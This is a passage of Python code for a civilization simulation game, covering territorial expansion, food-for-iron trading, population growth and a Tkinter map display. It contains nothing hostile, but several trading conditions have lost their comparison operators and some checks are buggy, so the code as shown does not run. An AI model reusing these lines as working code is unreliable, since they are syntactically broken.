dic_civ[civ[\"civ_number\"]][\"already_earned\"]):\n trading_interaction(civ,new_m,i,j)\n if new_m[x][y] < 10:\n if k == 0: # gives initial value\n new_pos_x = x # sets new pos to affect, initial one\n new_pos_y = y\n k += 1\n elif new_m[new_pos_x][new_pos_y] > new_m[x][y]: # comparison for best place\n new_pos_x = x # sets new pos to affect, not initial one\n new_pos_y = y\n next_turn -= 1 # removes a step from expanding\n if civ[\"expansion rate\"] == 2 and skip: # this if allows one more step for moderate civ\n next_turn += 1\n skip = False\n elif civ[\"expansion rate\"] == 3 and skip: # this if allows 2 more steps for warrior civ, expert civ won't get extra move.\n next_turn += 2\n skip = False\n if new_pos_x != \"fix\" and new_pos_y != \"fix\": # to fix the bug above\n if new_m[new_pos_x][new_pos_y] == 5:\n dic_civ[civ[\"civ_number\"]][\"next_expand\"] = 50\n elif new_m[new_pos_x][new_pos_y] == 6:\n dic_civ[civ[\"civ_number\"]][\"next_expand\"] = 30\n elif new_m[new_pos_x][new_pos_y] == 1 or new_m[new_pos_x][new_pos_y] == 2 or new_m[new_pos_x][\n new_pos_y] == 3 or new_m[new_pos_x][new_pos_y] == 4:\n dic_civ[civ[\"civ_number\"]][\"next_expand\"] = 10\n\n dic_civ[civ[\"civ_number\"]][\"population\"] += dic_population[new_m[new_pos_x][new_pos_y]] # updates population\n food, iron = dic_ressources[new_m[new_pos_x][new_pos_y]] # gets field food and iron\n dic_civ[civ[\"civ_number\"]][\"food_per_turn\"] += food*dic_civ[civ[\"civ_number\"]][\"productivity\"] # adds field food to civ food_per_turn\n dic_civ[civ[\"civ_number\"]][\"iron_per_turn\"] += iron*dic_civ[civ[\"civ_number\"]][\"productivity\"] # adds field iron to civ iron_per_turn\n dic_civ[civ[\"civ_number\"]][\"territories\"] += 1\n new_m[new_pos_x][new_pos_y] += civ[\"civ_number\"] * 10 # gives new value\n\n\n dic_civ[civ[\"civ_number\"]][\"food\"] -= dic_civ[civ[\"civ_number\"]][\"population\"]/2000\n #update_population(civ)\n # print(new_m) # for tests\n # print(\"\\n\") # for tests\n return new_m\n\n\ndef delete_civ(m,civ):\n civ_number = civ[\"civ_number\"]\n for i in range(len(m)):\n for j in range(len(m[i])):\n if math.floor(m[i][j]/10) == civ_number:\n m[i][j] = m[i][j]%10\n dic_civ.pop(civ_number,None)\n\n\ndef update_trading():\n for k in dic_civ:\n dic_civ[k][\"already_gave\"] = 0\n dic_civ[k][\"already_earned\"] = 0\n\ndef update_population(civ):\n '''golden = (1 + 5 ** 0.5) / 2\n current_pop = dic_civ[civ[\"civ_number\"]][\"population\"]\n new_pop = dic_civ[civ[\"civ_number\"]][\"food\"] * 2000\n deaths = (current_pop/10) -(golden**(-iteration))*new_pop\n if new_pop <= 0:\n new_born = 0.2*deaths\n else:\n new_born = 2*deaths\n if dic_civ[civ[\"civ_number\"]][\"type\"] == \"warrior\":\n dic_civ[civ[\"civ_number\"]][\"population\"] = current_pop - deaths + new_born\n elif dic_civ[civ[\"civ_number\"]][\"type\"] == \"expert\":\n dic_civ[civ[\"civ_number\"]][\"population\"] = current_pop - deaths + new_born\n elif dic_civ[civ[\"civ_number\"]][\"type\"] == \"moderate\":\n dic_civ[civ[\"civ_number\"]][\"population\"] = current_pop - deaths + new_born\n '''\n if dic_civ[civ[\"civ_number\"]][\"type\"] == \"warrior\":\n dic_civ[civ[\"civ_number\"]][\"population\"] += (dic_civ[civ[\"civ_number\"]][\"food\"] * 2000)/10\n elif dic_civ[civ[\"civ_number\"]][\"type\"] == \"expert\":\n dic_civ[civ[\"civ_number\"]][\"population\"] += (dic_civ[civ[\"civ_number\"]][\"food\"] * 2000)/10\n elif dic_civ[civ[\"civ_number\"]][\"type\"] == \"moderate\":\n dic_civ[civ[\"civ_number\"]][\"population\"] += (dic_civ[civ[\"civ_number\"]][\"food\"] * 2000)/10\n\n\n\ndef trading_interaction(civ,m,i,j,trading_rate=1):\n civ_number = civ[\"civ_number\"]\n trade_amount = (dic_civ[civ_number][\"food_per_turn\"] - dic_civ[civ_number][\"population\"] / 2000)\n if trade_amount>=0:\n if m[i][j]>= civ_number*10 and m[i][j] < civ_number*20:\n if i + 1 < len(m) and math.floor(m[i+1][j] / 10)!=civ_number and math.floor(m[i+1][j] / 10)>= 1:\n if dic_civ[civ_number][\"food\"]>10*trade_amount:\n necessary = 2*dic_civ[math.floor(m[i+1][j] / 10)][\"population\"]/2000\n if dic_civ[math.floor(m[i+1][j] / 10)][\"food\"]trade_amount/trading_rate:\n dic_civ[math.floor(m[i+1][j] / 10)][\"iron\"] -= trade_amount/trading_rate\n dic_civ[math.floor(m[i+1][j] / 10)][\"food\"] += trade_amount\n dic_civ[civ_number][\"iron\"] += trade_amount/trading_rate\n dic_civ[civ_number][\"food\"] -= trade_amount\n dic_civ[civ_number][\"already_gave\"] = 1\n print(\"Civ \"+str(civ_number)+\" traded \"+str(round(trade_amount,2))+\"food with Civ\"+str(math.floor(m[i+1][j] / 10)))\n elif j - 1 < len(m) and math.floor(m[i][j - 1] / 10)!=civ_number and math.floor(m[i][j - 1] / 10)>= 1:\n if dic_civ[civ_number][\"food\"] > 10*trade_amount:\n necessary = 2*dic_civ[math.floor(m[i][j - 1] / 10)][\"population\"]/2000\n if dic_civ[math.floor(m[i][j - 1] / 10)][\"food\"]trade_amount/trading_rate:\n dic_civ[math.floor(m[i][j - 1] / 10)][\"iron\"] -= trade_amount/trading_rate\n dic_civ[math.floor(m[i][j - 1] / 10)][\"food\"] += trade_amount\n dic_civ[civ_number][\"iron\"] += trade_amount/trading_rate\n dic_civ[civ_number][\"food\"] -= trade_amount\n dic_civ[civ_number][\"already_gave\"] = 1\n print(\"Civ \" + str(civ_number) + \" traded \" + str(round(trade_amount,2)) + \"food with Civ\" + str(\n math.floor(m[i][j-1] / 10)))\n\n elif i - 1 < len(m) and math.floor(m[i-1][j] / 10)!=civ_number and math.floor(m[i-1][j] / 10)>= 1:\n if dic_civ[civ_number][\"food\"] > 10*trade_amount:\n necessary = 2*dic_civ[math.floor(m[i-1][j] / 10)][\"population\"]/2000\n if dic_civ[math.floor(m[i-1][j]/ 10)][\"food\"]trade_amount/trading_rate:\n dic_civ[math.floor(m[i-1][j] / 10)][\"iron\"] -= trade_amount/trading_rate\n dic_civ[math.floor(m[i-1][j] / 10)][\"food\"] += trade_amount\n dic_civ[civ_number][\"iron\"] += trade_amount/trading_rate\n dic_civ[civ_number][\"food\"] -= trade_amount\n dic_civ[civ_number][\"already_gave\"] = 1\n print(\"Civ \" + str(civ_number) + \" traded \" + str(round(trade_amount,2)) + \"food with Civ\" + str(\n math.floor(m[i - 1][j] / 10)))\n\n elif j + 1 < len(m) and math.floor(m[i][j+1] / 10)!=civ_number and math.floor(m[i][j+1] / 10)>= 1:\n if dic_civ[civ_number][\"food\"] > 10*trade_amount:\n necessary = 2*dic_civ[math.floor(m[i][j+1] / 10)][\"population\"]/2000\n if dic_civ[math.floor(m[i][j+1]/ 10)][\"food\"]trade_amount/trading_rate:\n dic_civ[math.floor(m[i][j+1] / 10)][\"iron\"] -= trade_amount/trading_rate\n dic_civ[math.floor(m[i][j+1] / 10)][\"food\"] += trade_amount\n dic_civ[civ_number][\"iron\"] += trade_amount/trading_rate\n dic_civ[civ_number][\"food\"] -= trade_amount\n dic_civ[civ_number][\"already_gave\"] = 1\n print(\"Civ \" + str(civ_number) + \" traded \" + str(round(trade_amount,2)) + \"food with Civ\" + str(\n math.floor(m[i][j+1] / 10)))\n elif not dic_civ[civ_number][\"already_earned\"]:\n trade_amount *= -1\n if m[i][j] >= civ_number * 10 and m[i][j] < civ_number * 20:\n if i + 1 < len(m) and math.floor(m[i + 1][j] / 10) != civ_number and math.floor(m[i + 1][j] / 10) >= 1:\n if dic_civ[math.floor(m[i + 1][j] / 10)][\"food\"] > 10 * trade_amount:\n necessary = 2 * dic_civ[math.floor(m[i + 1][j] / 10)][\"population\"] / 2000\n if dic_civ[math.floor(m[i + 1][j] / 10)][\"food\"] < necessary:\n if dic_civ[civ_number][\"iron\"] > trade_amount / trading_rate:\n dic_civ[math.floor(m[i + 1][j] / 10)][\"iron\"] += trade_amount / trading_rate\n dic_civ[math.floor(m[i + 1][j] / 10)][\"food\"] -= trade_amount\n dic_civ[civ_number][\"iron\"] -= trade_amount / trading_rate\n dic_civ[civ_number][\"food\"] += trade_amount\n dic_civ[civ_number][\"already_earned\"] = 1\n print(\"Civ \" + str(civ_number) + \" earned \" + str(round(trade_amount,2)) + \"food from Civ\" + str(math.floor(m[i+1][j] / 10)))\n\n elif j - 1 < len(m) and math.floor(m[i][j - 1] / 10) != civ_number and math.floor(m[i][j - 1] / 10) >= 1:\n if dic_civ[math.floor(m[i][j - 1] / 10)][\"food\"] > 10 * trade_amount:\n necessary = 2 * dic_civ[math.floor(m[i][j - 1] / 10)][\"population\"] / 2000\n if dic_civ[math.floor(m[i][j - 1] / 10)][\"food\"] < necessary:\n if dic_civ[civ_number][\"iron\"] > trade_amount / trading_rate:\n dic_civ[math.floor(m[i][j - 1] / 10)][\"iron\"] += trade_amount / trading_rate\n dic_civ[math.floor(m[i][j - 1] / 10)][\"food\"] -= trade_amount\n dic_civ[civ_number][\"iron\"] -= trade_amount / trading_rate\n dic_civ[civ_number][\"food\"] += trade_amount\n dic_civ[civ_number][\"already_earned\"] = 1\n print(\"Civ \" + str(civ_number) + \" earned \" + str(round(trade_amount,2)) + \"food from Civ\" + str(\n math.floor(m[i][j-1] / 10)))\n\n elif i - 1 < len(m) and math.floor(m[i - 1][j] / 10) != civ_number and math.floor(m[i - 1][j] / 10) >= 1:\n if dic_civ[math.floor(m[i - 1][j] / 10)][\"food\"] > 10 * trade_amount:\n necessary = 2 * dic_civ[math.floor(m[i - 1][j] / 10)][\"population\"] / 2000\n if dic_civ[math.floor(m[i - 1][j] / 10)][\"food\"] < necessary:\n if dic_civ[civ_number][\"iron\"] > trade_amount / trading_rate:\n dic_civ[math.floor(m[i - 1][j] / 10)][\"iron\"] += trade_amount / trading_rate\n dic_civ[math.floor(m[i - 1][j] / 10)][\"food\"] -= trade_amount\n dic_civ[civ_number][\"iron\"] -= trade_amount / trading_rate\n dic_civ[civ_number][\"food\"] += trade_amount\n dic_civ[civ_number][\"already_earned\"] = 1\n print(\"Civ \" + str(civ_number) + \" earned \" + str(round(trade_amount,2)) + \"food from Civ \" + str(\n math.floor(m[i-1][j] / 10)))\n\n elif j + 1 < len(m) and math.floor(m[i][j + 1] / 10) != civ_number and math.floor(m[i][j + 1] / 10) >= 1:\n if dic_civ[math.floor(m[i][j + 1] / 10)][\"food\"] > 10 * trade_amount:\n necessary = 2 * dic_civ[math.floor(m[i][j + 1] / 10)][\"population\"] / 2000\n if dic_civ[math.floor(m[i][j + 1] / 10)][\"food\"] < necessary:\n if dic_civ[civ_number][\"iron\"] > trade_amount / trading_rate:\n dic_civ[math.floor(m[i][j + 1] / 10)][\"iron\"] += trade_amount / trading_rate\n dic_civ[math.floor(m[i][j + 1] / 10)][\"food\"] -= trade_amount\n dic_civ[civ_number][\"iron\"] -= trade_amount / trading_rate\n dic_civ[civ_number][\"food\"] += trade_amount\n dic_civ[civ_number][\"already_earned\"] = 1\n print(\"Civ \" + str(civ_number) + \" earned \" + str(round(trade_amount,2)) + \"food from Civ \" + str(\n math.floor(m[i][j +1] / 10)))\n\n\ndef safe_reaction(k,m):\n if dic_civ[k][\"reaction\"] == 2:\n dic_civ[k][\"reaction\"] = 0\n global dic_civ\n dic_civ[k][\"food\"] += dic_civ[k][\"food_per_turn\"]\n dic_civ[k][\"iron\"] += dic_civ[k][\"iron_per_turn\"] # adds field iron to civ iron_per_turn\n \n else:\n dic_civ[k][\"reaction\"] += 1\n dynamics_civ(dic_civ[k],m)\n\n\ndef check_surroundings(m, x, y):\n '''\n checks best surroundings in + shape with m[x][y] at middle. Allows spheric map(returning to left if at right and moving left, same vertically)\n '''\n if x + 1 < len(m) and m[x + 1][y] == 1:\n return x + 1, y\n elif y - 1 < len(m) and m[x][y - 1] == 1:\n return x, y - 1\n elif x - 1 < len(m) and m[x - 1][y] == 1:\n return x - 1, y\n elif y + 1 < len(m) and m[x][y + 1] == 1:\n return x, y + 1\n\n elif x + 1 < len(m) and m[x + 1][y] == 2:\n return x + 1, y\n elif y - 1 < len(m) and m[x][y - 1] == 2:\n return x, y - 1\n elif x - 1 < len(m) and m[x - 1][y] == 2:\n return x - 1, y\n elif y + 1 < len(m) and m[x][y + 1] == 2:\n return x, y + 1\n\n elif x + 1 < len(m) and m[x + 1][y] == 3:\n return x + 1, y\n elif y - 1 < len(m) and m[x][y - 1] == 3:\n return x, y - 1\n elif x - 1 < len(m) and m[x - 1][y] == 3:\n return x - 1, y\n elif y + 1 < len(m) and m[x][y + 1] == 3:\n return x, y + 1\n\n elif x + 1 < len(m) and m[x + 1][y] == 4:\n return x + 1, y\n elif y - 1 < len(m) and m[x][y - 1] == 4:\n return x, y - 1\n elif x - 1 < len(m) and m[x - 1][y] == 4:\n return x - 1, y\n elif y + 1 < len(m) and m[x][y + 1] == 4:\n return x, y + 1\n\n elif x + 1 < len(m) and m[x + 1][y] == 5:\n return x + 1, y\n elif y - 1 < len(m) and m[x][y - 1] == 5:\n return x, y - 1\n elif x - 1 < len(m) and m[x - 1][y] == 5:\n return x - 1, y\n elif y + 1 < len(m) and m[x][y + 1] == 5:\n return x, y + 1\n\n elif x + 1 < len(m) and m[x + 1][y] == 6:\n return x + 1, y\n elif y - 1 < len(m) and m[x][y - 1] == 6:\n return x, y - 1\n elif x - 1 < len(m) and m[x - 1][y] == 6:\n return x - 1, y\n elif y + 1 < len(m) and m[x][y + 1] == 6:\n return x, y + 1\n else:\n return x, y\n\n\ndef check_surroundings2(m, x, y):\n '''\n Returns the coordinates of the best surrounding field for a given (civilization) tile and map.\n '''\n x1 = x\n y1 = y\n # the best pos is initially setted on the current pos of the civilization so that if it is surrounded by other civilization it won't moove\n best_pos = m[x][y]\n # the first test is to make sure we won't get an index out of the range of the matrix,\n # the second is to avoid having a civilization that takes over the field of another,\n # the third is a comparison of the field to choose the best one.\n if x + 1 < len(m) and m[x + 1][y] < 10 and m[x + 1][y] < best_pos:\n best_pos = m[x + 1][y]\n x1 = x + 1\n y1 = y\n if y + 1 > len(m) and m[x][y + 1] < 10 and m[x][y + 1] < best_pos:\n best_pos = m[x][y + 1]\n x1 = x\n y1 = y + 1\n if m[x][y - 1] < 10 and m[x][y - 1] < best_pos:\n best_pos = m[x][y - 1]\n x1 = x\n y1 = y - 1\n if m[x - 1][y] < 10 and m[x - 1][y] < best_pos:\n x1 = x - 1\n y1 = y\n\n return x1, y1\n\n\ndef dynamics_civ2(m, iterations):\n '''expand the civilizations on the map. A warrior civ expand by one field each turn, the moderate by one field each two turns, and\n the expert by one field each three turns. Deserts and mountains slow down the expansion of a civ by one turn.\n Returns the map after a given number of iteration or after filling all the map.\n '''\n new_m = m\n turn = 1\n not_slowed_down = True\n # (new_m >= 10).all() is to check that the civ is allowed to move again.\n while not ((new_m >= 10).all()) and turn < iterations:\n already_expanded = set()\n for i in range(len(new_m)): # going through all the map\n for j in range(len(new_m[i])):\n civ_num = math.floor(m[i][\n j] / 10) # this line extract the dozens digits wich correspound to the civ number ( wich is 0 if there's no civ on the field)\n # the first following condition is to make sure that we make the rest of the instruction only if the field (i,j) is a civ controlled field.\n # the second following condition is to make sure that when we run through the matrix we won't give a \"free\" moove the same civilisation two times\n # the last following condition is to affect different speeds of expansion to each civilisation based on the \"modulo\"\n if civ_num > 0:\n # each turn the civ harvest the fields that it possess:\n food, iron = dic_ressources[m[i][j] - civ_num * 10]\n dic_civ[civ_num][\"food\"] += food\n dic_civ[civ_num][\"iron\"] += iron\n if civ_num not in already_expanded and turn % dic_civ[civ_num][\"modulo\"] == 0:\n x, y = check_surroundings2(new_m, i, j) # choose the best adjacent field to expand\n if m[x][y] == 5 or m[x][y] == 6: # if the next field is a mountain or a desert\n not_slowed_down = not (not_slowed_down) # becomes False for one turn\n # the following condition is to make sure that if the civ cannot moove further she won't change the civ_number of the actual field she possess\n if (x != i or y != j) and not_slowed_down:\n m[x][y] = m[x][y] + math.floor(m[i][j] / 10) * 10\n already_expanded.add(civ_num)\n spread_population(new_m, x, y)\n for k in dic_civ:\n dic_civ[k][\"food\"] -= dic_civ[k][\"population\"] / 2000\n turn += 1\n #print(new_m)\n #print(\"\\n\")\n return new_m\n\n\ndef dynamics_civ2_incoming(m, iterations):\n '''expand the civilizations on the map. A warrior civ expand by one field each turn, the moderate by one field each two turns, and\n the expert by one field each three turns. Deserts and mountains slow down the expansion of a civ by one turn.\n Returns the map after a given number of iteration or after filling all the map.\n '''\n new_m = m\n turn = 1\n not_slowed_down = True\n #list_x = []\n #list_food = []\n #list_food2 = []\n #list_popu=[]\n while turn < iterations:\n already_expanded = set()\n new_field = set()\n for k in dic_civ:\n dic_civ[k][\"food\"] -= dic_civ[k][\"population\"] / 2000\n update_population(dic_civ[k])\n for i in range(len(new_m)): # going through all the map\n for j in range(len(new_m[i])):\n civ_num = math.floor(new_m[i][j] / 10)\n if civ_num > 0:\n if (i, j) not in new_field:\n #print((i,j))\n food, iron = dic_ressources[new_m[i][j] - civ_num * 10]\n dic_civ[civ_num][\"food\"] += food * dic_civ[civ_num][\"productivity\"]\n dic_civ[civ_num][\"iron\"] += iron * dic_civ[civ_num][\"productivity\"]\n if civ_num not in already_expanded and turn % dic_civ[civ_num][\"modulo\"] == 0:\n x, y = check_surroundings2(new_m, i, j)\n if new_m[x][y] == 5 or new_m[x][y] == 6:\n not_slowed_down = not (not_slowed_down)\n if (x != i or y != j) and not_slowed_down:\n new_m[x][y] = new_m[x][y] + civ_num * 10\n already_expanded.add(civ_num)\n spread_population(new_m, x, y)\n new_field.add((x%len(new_m), y%len(new_m)))\n\n # les lignes précédents le for servent à tracer des courbes pour\n #list_x.append(turn)\n #list_food.append(dic_civ[2][\"food\"])\n #list_popu.append(dic_civ[2][\"food\"]-dic_civ[2][\"population\"]/2000)\n # list_food2.append(dic_civ[2][\"food\"] * 2000 - dic_civ[2][\"population\"])\n #plt.plot(list_x, list_food, 'r')\n #plt.plot(list_x, list_popu,'g')\n # plt.plot(list_x, list_food2, 'g')\n #plt.ylabel('r: food initiale, g: food final')\n #plt.xlabel(\"tour\")\n turn += 1\n #print(\"\\n\")\n\n #print(new_m)\n #print(\"\\n\")\n return new_m\n\ndef iterate(m):\n global gnot_slowed_down\n gnot_slowed_down = not gnot_slowed_down\n global gnew_m\n gnew_m = m\n global gturn\n already_expanded = set()\n new_field = set()\n for k in dic_civ:\n dic_civ[k][\"food\"] -= dic_civ[k][\"population\"] / 2000\n update_population(dic_civ[k])\n for i in range(len(gnew_m)): # going through all the map\n for j in range(len(gnew_m[i])):\n civ_num = math.floor(gnew_m[i][j] / 10)\n if civ_num > 0:\n if (i, j) not in new_field:\n # print((i,j))\n food, iron = dic_ressources[gnew_m[i][j] - civ_num * 10]\n dic_civ[civ_num][\"food\"] += food * dic_civ[civ_num][\"productivity\"]\n dic_civ[civ_num][\"iron\"] += iron * dic_civ[civ_num][\"productivity\"]\n if (civ_num not in already_expanded) and (gturn % dic_civ[civ_num][\"modulo\"]) == 0:\n x, y = check_surroundings2(gnew_m, i, j)\n if gnew_m[x][y] == 5 or gnew_m[x][y] == 6:\n gnot_slowed_down = not (gnot_slowed_down)\n if (x != i or y != j) and gnot_slowed_down:\n gnew_m[x][y] = gnew_m[x][y] + civ_num * 10\n already_expanded.add(civ_num)\n spread_population(gnew_m, x, y)\n new_field.add((x % len(gnew_m), y % len(gnew_m)))\n gturn += 1\n return gnew_m\n\n\ndef civ_color(civ_number):\n new_number = int(civ_number)\n if new_number == 1:\n return \"red\"\n elif new_number == 2:\n return \"blue\"\n elif new_number == 3:\n return \"black\"\n elif new_number == 4:\n return \"light yellow\"\n elif new_number == 5:\n return \"dark khaki\"\n elif new_number == 6:\n return \"dark slate blue\"\n\n# tests for image\nclass Show:\n\n def __init__(self):\n self.root = Tk()\n\n self.root.lift()\n self.root.attributes('-topmost', True)\n self.root.after_idle(self.root.attributes, '-topmost', False)\n self.root.geometry(\"+0+0\")\n\n self.turn = 0\n self.dyn_type = 3\n\n image1 = Image.open(\"image1.gif\")\n image1 = image1.resize((20, 20), Image.ANTIALIAS)\n self.image1 = ImageTk.PhotoImage(image1)\n image2 = Image.open(\"image2.gif\")\n image2 = image2.resize((20, 20), Image.ANTIALIAS)\n self.image2 = ImageTk.PhotoImage(image2)\n image3 = Image.open(\"image3.gif\")\n image3 = image3.resize((20, 20), Image.ANTIALIAS)\n self.image3 = ImageTk.PhotoImage(image3)\n image4 = Image.open(\"image4.gif\")\n image4 = image4.resize((20, 20), Image.ANTIALIAS)\n self.image4 = ImageTk.PhotoImage(image4)\n image5 = Image.open(\"image5.gif\")\n image5 = image5.resize((20, 20), Image.ANTIALIAS)\n self.image5 = ImageTk.PhotoImage(image5)\n image6 = Image.open(\"image6.gif\")\n image6 = image6.resize((20, 20), Image.ANTIALIAS)\n self.image6 = ImageTk.PhotoImage(image6)\n # same with borders possible\n bor_image1 = Image.open(\"image1.gif\")\n bor_image1 = bor_image1.resize((16, 16), Image.ANTIALIAS)\n self.bor_image1 = ImageTk.PhotoImage(bor_image1)\n bor_image2 = Image.open(\"image2.gif\")\n bor_image2 = bor_image2.resize((16, 16), Image.ANTIALIAS)\n self.bor_image2 = ImageTk.PhotoImage(bor_image2)\n bor_image3 = Image.open(\"image3.gif\")\n bor_image3 = bor_image3.resize((16, 16), Image.ANTIALIAS)\n self.bor_image3 = ImageTk.PhotoImage(bor_image3)\n bor_image4 = Image.open(\"image4.gif\")\n bor_image4 = bor_image4.resize((16, 16), Image.ANTIALIAS)\n self.bor_image4 = ImageTk.PhotoImage(bor_image4)\n bor_image5 = Image.open(\"image5.gif\")\n bor_image5 = bor_image5.resize((16, 16), Image.ANTIALIAS)\n self.bor_image5 = ImageTk.PhotoImage(bor_image5)\n bor_image6 = Image.open(\"image6.gif\")\n bor_image6 = bor_image6.resize((16, 16), Image.ANTIALIAS)\n self.bor_image6 = ImageTk.PhotoImage(bor_image6)\n # capitals special\n image1_c = Image.open(\"image1_c.gif\")\n image1_c = image1_c.resize((16, 16), Image.ANTIALIAS)\n self.image1_c = ImageTk.PhotoImage(image1_c)\n image2_c = Image.open(\"image2_c.gif\")\n image2_c = image2_c.resize((16, 16), Image.ANTIALIAS)\n self.image2_c = ImageTk.PhotoImage(image2_c)\n image3_c = Image.open(\"image3_c.gif\")\n image3_c = image3_c.resize((16, 16), Image.ANTIALIAS)\n self.image3_c = ImageTk.PhotoImage(image3_c)\n image4_c = Image.open(\"image4_c.gif\")\n image4_c = image4_c.resize((16, 16), Image.ANTIALIAS)\n self.image4_c = ImageTk.PhotoImage(image4_c)\n image5_c = Image.open(\"image5_c.gif\")\n image5_c = image5_c.resize((16, 16), Image.ANTIALIAS)\n self.image5_c = ImageTk.PhotoImage(image5_c)\n image6_c = Image.open(\"image6_c.gif\")\n image6_c = image6_c.resize((16, 16), Image.ANTIALIAS)\n self.image6_c = ImageTk.PhotoImage(image6_c)\n\n self.start = Button(self.root,text=\"Iterate\",command=self.simulate)\n self.iterate10 = Button(self.root,text=\"10\",command=lambda:self.iter(10))\n self.iterate100 = Button(self.root, text=\"100\", command=lambda: self.iter(100))\n self.iterate1000 = Button(self.root, text=\"1000\", command=lambda: self.iter(1000))\n self.spawn = Button(self.root,text=\"Spawn new civ...\",command=self.spawn_new_civ)\n\n self.OptionsList = (\"Dynamic 1\", \"Dynamic 2\")\n self.optionmenu_v = StringVar()\n self.optionmenu_v.set(self.OptionsList[0])\n self.label2 = Label(self.root, text=\"Choose dynamic function :\")\n self.label2.grid(row=0, column=0, sticky=W)\n self.to = OptionMenu(self.root, self.optionmenu_v, *self.OptionsList)\n self.to.grid(row=0, column=1, sticky=W)\n self.submit = Button(self.root,text=\"Start\",command=self.spawn_start)\n self.submit.grid(row=3,column=0,sticky=W)\n\n self.pre_m = np.random.randint(0, 1, (45, 45))\n self.m = create_map_random()\n #print(self.m)\n #print(\"\\n\")\n\n self.m = homogeneize(self.m)\n #print(\"\\n\")\n # for tests\n\n create_civ(\"warrior\")\n self.m = spawn_civ(dic_civ[1], self.m, 0, 0)\n create_civ(\"expert\")\n self.m = spawn_civ(dic_civ[2], self.m, 15, 15)\n create_civ(\"moderate\")\n self.m = spawn_civ(dic_civ[3], self.m, 30, 30) # 3 civs\n #print(self.m)\n #print(\"\\n\")\n\n # dynamics_civ2_incoming(m,5000)\n\n self.turn_label = Label(self.root,text=\"\",justify=LEFT,anchor=W,width=60)\n self.food_label = Label(self.root,text=\"\",justify=LEFT,anchor=W,width=60)\n self.iron_label = Label(self.root,text=\"\",justify=LEFT,anchor=W,width=60)\n self.population_label = Label(self.root,text=\"\",justify=LEFT,anchor=W,width=60)\n self.food_paid_label = Label(self.root,text=\"\",justify=LEFT,anchor=W,width=60)\n self.food_turn_label = Label(self.root,text=\"\",justify=LEFT,anchor=W,width=60)\n self.territories_label = Label(self.root,text=\"\",justify=LEFT,anchor=W,width=60)\n\n # plt.show()\n self.sub = Frame(self.root)\n self.sub.grid(row=0, column=2,rowspan=10, sticky=NW)\n\n self.animation_var = IntVar()\n self.animate = Checkbutton(self.root,text=\"Animate\",variable=self.animation_var)\n self.animate.grid(row=1,column=0,sticky=NW)\n self.spawn.grid(row=2, column=0, sticky=NW)\n\n self.show_once(True)\n\n self.root.mainloop()\n\n def iter(self,iteration=1):\n for i in range(iteration):\n self.root.after((i + 1) * 50*self.higher_gap(self.turn), self.simulate)\n\n def spawn_start(self):\n place = 0\n self.label2.grid_forget()\n self.to.grid_forget()\n self.submit.grid_forget()\n self.animate.grid_forget()\n self.spawn.grid_forget()\n self.dyna = self.optionmenu_v.get()\n if self.dyna == \"Dynamic 2\":\n self.dyn_type = 2\n elif self.dyna == \"Dynamic 1\":\n self.dyn_type = 1\n if self.animation_var.get() == 0:\n place = 0\n elif self.animation_var.get() == 1:\n place = 4\n\n self.turn_label.grid(row=5-place,column=0, sticky=NW)\n self.food_label.grid(row=6-place,column=0, sticky=NW)\n '''self.iron_label.grid(row=7-place,column=0, sticky=NW)\n self.population_label.grid(row=8-place,column=0, sticky=NW)\n self. food_paid_label.grid(row=9-place,column=0, sticky=NW)\n self.food_turn_label.grid(row=10-place,column=0, sticky=NW)\n self.territories_label.grid(row=11-place,column=0, sticky=NW)'''\n self.update_labels()\n if self.animation_var.get() == 0:\n self.start.grid(row=0, column=0, sticky=NW)\n self.iterate10.grid(row=1,column=0,sticky=NW)\n self.iterate100.grid(row=2,column=0,sticky=NW)\n self.iterate1000.grid(row=3, column=0, sticky=NW)\n self.spawn.grid(row=4,column=0,sticky=NW)\n elif self.animation_var.get() == 1:\n #self.root.after(3000, self.simulate)\n for k in range(1500):\n self.root.after(3000+(k+1)*50*self.higher_gap(k),self.simulate)\n\n\n def update_labels(self):\n s=''\n for k in dic_civ:\n s += \"\\nCiv \" + str(k) + \": \" + str(\n dic_civ[k][\"type\"] + \"\\nFood: \" + str(round(dic_civ[k][\"food\"], 2))) + \"\\nIron: \" + str(\n round(dic_civ[k][\"iron\"], 2)) + \"\\nPopulation: \" + str(\n round(dic_civ[k][\"population\"], 2)) + \"\\nPaying food : \" + str(\n round(dic_civ[k][\"population\"] / 2000, 2)) + \"\\nFood per turn: \" + str(\n round(dic_civ[k][\"food_per_turn\"], 2)) + \"\\nTerritories: \" + str(\n round(dic_civ[k][\"territories\"], 2)) + \"\\n\\n\"\n self.turn_label.configure(text=\"turn : \"+str(self.turn))\n self.food_label.configure(text=s)\n '''self.food_label.configure(text=\"warriors food:\\t\"+str(round(dic_civ[1][\"food\"],2))+\"\\nexperts food:\\t\"+str(round(dic_civ[2][\"food\"],2))+\"\\nmoderates food:\\t\"+str(round(dic_civ[3][\"food\"],2)))\n self.iron_label.configure(text=\"warriors iron:\\t\"+str(round(dic_civ[1][\"iron\"],2))+\"\\nexperts iron:\\t\"+str(round(dic_civ[2][\"iron\"],2))+\"\\nmoderates iron:\\t\"+str(round(dic_civ[3][\"iron\"],2)))\n self.population_label.configure(text=\"warriors population :\\t\"+str(round(dic_civ[1][\"population\"],2))+\"\\nexpert population :\\t\"+str(round(dic_civ[2][\"population\"],2))+\"\\nmoderate population :\\t\"+str(round(dic_civ[3][\"population\"],2)))\n self.food_paid_label.configure(text=\"warriors food paid per turn :\\t\"+str(round(dic_civ[1][\"population\"] / 2000,2))+\"\\nexpert food paid per turn :\\t\"+str(round(dic_civ[2][\"population\"] / 2000,2))+\"\\nmoderate food paid per turn :\\t\"+str(round(dic_civ[3][\"population\"] / 2000,2)))\n self.food_turn_label.configure(text=\"warriors food per turn :\\t\"+str(round(dic_civ[1][\"food_per_turn\"],2))+\"\\nexpert food per turn :\\t\"+str(round(dic_civ[2][\"food_per_turn\"],2))+\"\\nmoderate food per turn :\\t\"+str(round(dic_civ[3][\"food_per_turn\"],2)))\n self.territories_label.configure(text=\"warriors territories :\\t\"+str(round(dic_civ[1][\"territories\"],2))+\"\\nexpert territories :\\t\"+str(round(dic_civ[2][\"territories\"],2))+\"\\nmoderate territories :\\t\"+str(round(dic_civ[3][\"territories\"],2)))\n '''\n\n def show_once(self,first=False):\n if not first:\n for i in range(len(self.m)):\n for j in range(len(self.m[i])):\n if self.pre_m[i][j] != self.m[i][j]:\n list = self.sub.grid_slaves(i,j)\n if len(list) !=0:\n list[0].grid_forget()\n if self.m[i][j] % 10 == 1:\n if self.m[i][j] % 100 < 10:\n Label(self.sub, image=self.image1, bd=0).grid(row=i, column=j, sticky=NW)\n else:\n Label(self.sub, image=self.bor_image1, bd=2,\n 